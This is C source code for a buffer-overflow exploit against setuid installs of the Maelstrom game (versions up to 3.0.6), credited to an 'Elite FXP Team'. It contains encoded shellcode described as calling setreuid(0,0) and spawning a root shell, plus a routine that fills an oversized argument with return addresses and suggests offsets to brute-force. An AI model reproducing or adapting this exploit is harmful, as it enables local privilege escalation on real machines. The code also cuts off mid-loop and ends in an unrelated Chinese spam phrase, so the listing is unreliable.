/***************************************************************** *Maelstrom <=3.0.6 exploit written by r-code from Elite FXP Team * * dedicated to our TEAM ;] * * Usually Maelstrom isn`s +s, but many ppl set this attribute * * enjoy! * *****************************************************************/ #include #include #include unsigned long int get_sp(void) { __asm__("movl %esp,%eax"); } /* nothing special, prints some text :], setreuid(0,0) and runs a shell */ unsigned char shellcode[] = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\xe0\x80\x36\x01\x46\xe2\xfa" "\xea\x7e\x2e\x63\x68\x6f\x2e\x72\x69\x01\x91\x91\x91\x91\x91\x91" "\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91\x5a\x2a\x5c" "\x21\x52\x69\x64\x6d\x6d\x21\x52\x71\x60\x76\x6f\x64\x65\x20\x0b\x5a\x2a\x5c" "\x21\x46\x73\x64\x64\x75\x7b\x21\x75\x6e\x3b\x21\x62\x7b\x60\x73\x6f\x78\x2d" "\x7d\x72\x75\x60\x62\x69\x74\x7d\x2d\x7b\x60\x6c\x68\x2d\x73\x60\x7b\x6e\x73" "\x2d\x62\x78\x71\x69\x64\x73\x2d\x6b\x64\x65\x6d\x68\x6a\x0b\x5a\x2c\x5c\x21" "\x47\x74\x62\x6a\x3b\x21\x44\x6d\x72\x68\x4d\x60\x52\x6e\x67\x20\x0b\x01\x80" "\xed\x66\x2a\x01\x01\x91\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01" "\x01\x5a\x80\xc2\x8b\x10\x01\x01\xc6\x44\xfd\x01\x01\x01\x01\x8c\x82\xe3\xec" "\xfe\xfe\x88\x44\xf5\x88\x44\xf9\x8c\x8a\x01\xef\xfe\xfe\x30\xfe\xbb\x61\x01" "\x01\x01\xb9\x05\x01\x01\x01\x88\xff\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a" "\x01\x01\x01\x8a\x74\xf5\x88\xfb\x52\x88\xf2\xcc\x81\x5a\x5f\x5e\xc8\xc2"; #define LEN 8172 #define DEFAULT_OFFSET 3800 #define ALIGN 3 #define PATH "/usr/bin/Maelstrom" int main(int argc,char **argv) { register int i; char *evilstr=0,*str=0; unsigned long int retaddr=0,offset=DEFAULT_OFFSET,*ptr=0; printf(":: Maelstrom exploit by r-code d_fence@gmx.net ::\n"); printf(":: -=<[Elite FXP Team]>=- ::\n\n"); if(argc>1) offset=atoi(argv[1]); retaddr=get_sp() - offset; printf("[+] ESP: 0x%x\n",get_sp()); printf("[+] OFFSET 0x%x, RET_ADDR: 0x%x\n",offset,retaddr); printf("[+] If doesn't work try: \"%s 3500-4200\" in 150 steps\n",argv[0]); evilstr=(char *)malloc(LEN); evilstr+=ALIGN; /* Because of the evilstr[0x00]='2',evilstr[0x01]='@' */ ptr=(unsigned long int *)evilstr; for(i=0;i<(LEN/4);i++) *(ptr++)=(unsigned long int)retaddr; evilstr-=ALIGN; /* Rerturning to the previous pointer adress */ memset(evilstr,'A',(LEN/2)); evilstr[0x00]='2'; evilstr[0x01]='@'; for(i=0;i

亚洲欧美在线